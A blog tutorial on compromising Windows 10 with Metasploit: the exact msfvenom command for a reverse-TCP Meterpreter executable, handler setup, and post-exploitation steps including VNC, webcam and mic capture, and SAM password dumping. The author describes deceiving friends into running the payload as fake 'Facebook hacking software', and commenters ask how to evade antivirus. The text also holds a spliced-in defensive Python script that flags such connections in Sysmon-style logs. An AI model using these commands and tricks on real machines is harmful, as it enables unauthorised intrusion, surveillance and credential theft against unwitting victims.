Saturday, 4 February 2017

Metasploit Tutorial - 12 (hack WIN10/post exploit)

Steps and Instructions -

Today we will be hacking Windows 10 using Metasploit.

We will also do some basic post exploitation.

Requirement -

* Kali Linux

Some terms -

Payload - a file that is run on the target system to make a reverse TCP connection back to the handler.

Let's do it...

I am running two machines. One is Windows 10 and another is Kali Linux.

* First we will make a payload using msfvenom.

We will open a terminal and type in:

"msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=(your IP) LPORT=4444 -o /root/Desktop/monks.exe"

Here -p selects the payload,

--platform is windows, -a x86 is the architecture and -f exe is the output format.

LHOST should be your IP address.

/root/Desktop is the path where the file is kept.

monks.exe is the name of the payload.

This will take some time to make the payload.

You can do this hack without the payload. But we will do that in the next tutorial. Note that payload is only used to make a reverse TCP connection.

When you hit enter, you will get a message, as in the snapshot above, saying "No encoder or badchars specified, outputting raw payload".

That's totally fine as long as your payload has a size of 957487 bytes. Make sure that the payload is not empty.

Your payload should be on the Desktop

Now is the time to launch Metasploit.

* Open a terminal and type "msfconsole". This will give us a console to set up our handler.

To set up the handler we need to go through a series of commands:

"use multi/handler"

"set payload windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"


After the setup, when we run "exploit", the process will pause while it says "starting the payload handler".

That's because the payload still has to be placed on the target system and the target has to double-click it.
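The handler is waiting for the reverse TCP connection that the payload opens from the target back to LHOST:LPORT. From the defender's side, that connection is the observable: an executable sitting in a user-writable folder (the Desktop, in this tutorial) opening an outbound connection to a port that no legitimate service uses. The script below is an added example, not part of the original tutorial; it correlates constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records, and flags a process that meets both conditions. All log lines, hosts, paths and the list of expected ports are assumptions made up for the example.

```python
"""Added example: correlate constructed Sysmon-style records to spot a process
launched from a user-writable folder that opens an outbound connection to an
unexpected port (the shape of a reverse TCP connection). Not the tutorial's
own code; all sample data below is constructed."""
import re

# Ports this workstation is expected to talk to (assumption for the example).
EXPECTED_PORTS = {53, 80, 443, 445, 587, 993, 3389}

# Folders an ordinary user can write to; long-lived network-active processes
# rarely belong there.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\",
    re.IGNORECASE,
)

# Constructed Sysmon-style records, one per line, as key=value pairs.
SAMPLE_LOG = """\
EventID=1 Image=C:\\Users\\bob\\Desktop\\monks.exe ProcessId=4120 User=LAB\\bob ParentImage=C:\\Windows\\explorer.exe
EventID=1 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe ProcessId=5008 User=LAB\\bob ParentImage=C:\\Windows\\explorer.exe
EventID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe ProcessId=5008 DestinationIp=203.0.113.10 DestinationPort=443
EventID=3 Image=C:\\Users\\bob\\Desktop\\monks.exe ProcessId=4120 DestinationIp=192.0.2.50 DestinationPort=4444
EventID=3 Image=C:\\Windows\\System32\\svchost.exe ProcessId=900 DestinationIp=192.0.2.1 DestinationPort=53
"""


def parse_line(line):
    """Split a record into a dict. Values may contain spaces (e.g. 'Program
    Files'), so split only on whitespace that is followed by 'Key='."""
    fields = {}
    for token in re.split(r"\s+(?=\w+=)", line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def find_suspicious_connections(log_text):
    """Return (pid, image, dest_ip, dest_port, reasons) for every EventID=3
    record whose process both runs from a user-writable folder and talks to a
    port outside EXPECTED_PORTS."""
    started_from_user_dir = {}  # pid -> image, learned from EventID=1 records
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        image = ev.get("Image", "")
        if ev.get("EventID") == "1" and USER_WRITABLE.match(image):
            started_from_user_dir[ev["ProcessId"]] = image
        elif ev.get("EventID") == "3":
            reasons = []
            port = int(ev.get("DestinationPort", 0))
            if ev.get("ProcessId") in started_from_user_dir or USER_WRITABLE.match(image):
                reasons.append("image runs from a user-writable folder")
            if port not in EXPECTED_PORTS:
                reasons.append(f"unexpected destination port {port}")
            if len(reasons) == 2:  # both signals together: worth an alert
                findings.append((ev["ProcessId"], image, ev["DestinationIp"], port, reasons))
    return findings


if __name__ == "__main__":
    for pid, image, ip, port, reasons in find_suspicious_connections(SAMPLE_LOG):
        print(f"ALERT pid={pid} {image} -> {ip}:{port} ({'; '.join(reasons)})")
```

Run stand-alone it reports only the Desktop executable connecting to port 4444; the browser on 443 and svchost on 53 are left alone. Requiring both signals keeps the noise down: a browser downloaded to Downloads and a system service on an odd port each trip one condition but not both.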

Here you have to use your social engineering skills in order to place the payload inside the target system. Like I found this cool way where I uploaded the payload on MediaFire and told my friends that it is a Facebook hacking software. As expected they downloaded it and tried to run it.

It depends upon you how you make them execute it.

For now I will go to my windows 10 machine and double click on it

And when I come back to my Kali Machine

It says that we have an open session.

(Most people get stuck at "starting the payload handler....". There are several reasons for getting stuck at this point. Stick to the end to read about troubleshooting.)

OK. Now comes the post exploitation part.

We can run VNC to get live administration over the target.

* type "run vnc"

Just a tip, guys. If you are running in VMware, don't do VNC. It will show you something like this.

As you can see, it is totally fucked up.

That's because it will show us the target machine, which is the physical host running the VMware machine. So it's a mirror effect.

We can use commands like -

"getuid" for the username

"sysinfo" for target specs

"run post/windows/gather/checkvm" to know if the target is real or virtual

"run post/windows/gather/enum_applications" to see the running services in the target machine

Here is the list of programs running

We can look at the help menu by typing "help"

You will get lots of options, like the ones here for webcams.

Here you can record the mic, chat over the webcam, take snaps or stream it live.

You can dump the passwords from SAM database.

Lots of options for post exploitation.

I have done it on LAN. But if you wish to do it on WAN then you have to port forward your router and listen on that open port.

Troubleshoot it -

If your handler is on hold after "starting the payload handler....".

There can be many reasons. Like -

* The target has not clicked on the payload and run it.

* If you are doing it on VMware, where the payload doesn't work on a few operating systems.

I used to have this same problem when I had VMware running on Win 8. It didn't have the VM0 adapter in the VMware function. That will not let you connect via a reverse TCP connection.

* When you are doing it on WAN. It's a complicated shit.

Thank you guys for reading this tutorial.

You may want to see my other tutorials on Metasploit-


  1. Dude, invalid payload selected error

    1. You haven't entered the right exact command. Copy paste the command from above tutorial. Be sure to use msfvenom in Kali Linux 2

  2. [-] Could not execute vnc: Rex::Post::Meterpreter::RequestError "stdapi_sys_process_execute: Operation failed: Access is denied."
    that's what I get. Plus I notice that the payload is easily detected by Google if I try to send it by email. If I use a thumb drive, Avast stops it from being executed, identifying it as a virus. Not a very practical hack seeing as the default security settings are enough to deter it. Or is there a way to cloak it better?